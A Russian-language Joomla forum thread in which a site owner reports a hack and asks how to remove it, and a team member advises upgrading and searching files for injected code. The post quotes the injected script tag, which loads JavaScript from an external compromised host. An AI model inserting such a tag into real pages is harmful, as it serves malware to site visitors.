Взлом Joomla Версия 1.5.20

Тема в разделе "Вопросы безопасности", создана пользователем A_S, 08.07.2013.

  1. Offline

    A_S Недавно здесь

    Регистрация:
    08.07.2013
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Привет всем! Мой сайт недавно взломали, теперь google выдает следующее предупреждение - "посещение этого сайта может нанести вред Вашему компьютеру!" Так же он предлагает как проблему на всех страницах сайта Возможный внедренный код: """""<script type="text/javascript" src="http://psy-ufa.ru/wp-inc
    ludes/images/wlw/1/404.php">""""" но нигде в коде я его не обнаружил

    Подскажите пожалуйста, кто знает как избавиться от этой проблемы?
    В этом деле чайник, сталкиваюсь в первый раз.
     
  2.  
  3. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 044
    Симпатии:
    519
    Пол:
    Мужской
    Обновить до 1.5.26
    Искать вставки вредоносного кода в файлах сайта
    Встречал недавно такой код на сайте клиента
     

Поделиться этой страницей

Загрузка...